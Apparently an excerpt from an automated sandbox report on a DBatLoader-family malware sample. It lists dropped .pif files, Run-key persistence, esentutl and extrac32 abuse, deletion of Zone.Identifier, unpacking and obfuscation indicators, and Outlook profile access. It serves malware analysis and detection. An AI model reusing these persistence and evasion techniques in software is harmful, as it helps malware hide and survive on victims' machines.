Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\Libraries\xrbjyllC.pif

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: z1Transaction_ID_REF2418_cmd.bat

Static file information: File size 1139107 > 1048576

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: x.exe, x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020EED000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1667912373.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: xrbjyllC.pif, 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000006.00000003.1716976132.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr
Source:	Binary string: easinvoker.pdbH source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1723790812.0000000003004000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668442812.0000000003000000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1716716045.0000000021720000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1716716045.0000000021751000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020EED000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1667912373.000000007FE00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: esentutl.exe, 00000006.00000003.1716976132.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Unpacked PE file: 9.2.xrbjyllC.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Unpacked PE file: 11.2.xrbjyllC.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Unpacked PE file: 17.2.xrbjyllC.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Unpacked PE file: 9.2.xrbjyllC.pif.400000.2.unpack
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Unpacked PE file: 11.2.xrbjyllC.pif.400000.2.unpack
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Unpacked PE file: 17.2.xrbjyllC.pif.400000.1.unpack

Yara detected DBatLoader

Source: Yara match

File source: 3.2.x.exe.31c0000.0.unpack, type: UNPACKEDPE

.NET source code contains method to dynamically call methods (often used by packers)

Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Binary contains a suspicious time stamp

Source: xrbjyllC.pif.3.dr

Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_031D894C LoadLibraryW,GetProcAddress,FreeLibrary,

3_2_031D894C

PE file contains sections with non-standard names

Source: alpha.pif.6.dr

Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031C332C push eax; ret	3_2_031C3368
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031CC349 push 8B031CC1h; ret	3_2_031CC34E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031EC378 push 031EC56Eh; ret	3_2_031EC566
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031C63B0 push 031C640Bh; ret	3_2_031C6403
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031C63AE push 031C640Bh; ret	3_2_031C6403
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031ED2FC push 031ED367h; ret	3_2_031ED35F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031DF108 push ecx; mov dword ptr [esp], edx	3_2_031DF10D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031ED144 push 031ED1ECh; ret	3_2_031ED1E4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031ED1F8 push 031ED288h; ret	3_2_031ED280
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D306C push 031D30B9h; ret	3_2_031D30B1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D306B push 031D30B9h; ret	3_2_031D30B1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031ED0AC push 031ED125h; ret	3_2_031ED11D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031C6784 push 031C67C6h; ret	3_2_031C67BE
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031C6782 push 031C67C6h; ret	3_2_031C67BE
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031EC570 push 031EC56Eh; ret	3_2_031EC566
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031CC56C push ecx; mov dword ptr [esp], edx	3_2_031CC571
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031CD5A0 push 031CD5CCh; ret	3_2_031CD5C4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031CCBEC push 031CCD72h; ret	3_2_031CCD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031CCA1E push 031CCD72h; ret	3_2_031CCD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03234A50 push eax; ret	3_2_03234B20
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031DAADF push 031DAB18h; ret	3_2_031DAB10
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D8AD8 push 031D8B10h; ret	3_2_031D8B08
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031DAAE0 push 031DAB18h; ret	3_2_031DAB10
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D790C push 031D7989h; ret	3_2_031D7981
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D6948 push 031D69F3h; ret	3_2_031D69EB
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D6946 push 031D69F3h; ret	3_2_031D69EB
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D886C push 031D88AEh; ret	3_2_031D88A6
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D2F60 push 031D2FD6h; ret	3_2_031D2FCE
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D5E7C push ecx; mov dword ptr [esp], edx	3_2_031D5E7E
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_0041C40C push cs; iretd	9_2_0041C4E2
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00423149 push eax; ret	9_2_00423179

Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'PosZJRXGKiG9D', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'PosZJRXGKiG9D', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'PosZJRXGKiG9D', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'PosZJRXGKiG9D', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'PosZJRXGKiG9D', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Cllyjbrx.PIF	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\xrbjyllC.pif	Jump to dropped file

Drops PE files

Source: C:\Users\Public\Libraries\xrbjyllC.pif	File created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\user\AppData\Local\Temp\x.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Cllyjbrx.PIF	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\xrbjyllC.pif	Jump to dropped file

Drops PE files to the user directory

Source: C:\Windows\SysWOW64\esentutl.exe

File created: C:\Users\Public\alpha.pif

Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Cllyjbrx			Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIb			Jump to behavior

Drops PE files to the user root directory

Source: C:\Windows\SysWOW64\esentutl.exe

File created: C:\Users\Public\alpha.pif

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Cllyjbrx	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Cllyjbrx	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIb	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIb	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes \| delete

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_031DAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_031DAB1C

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
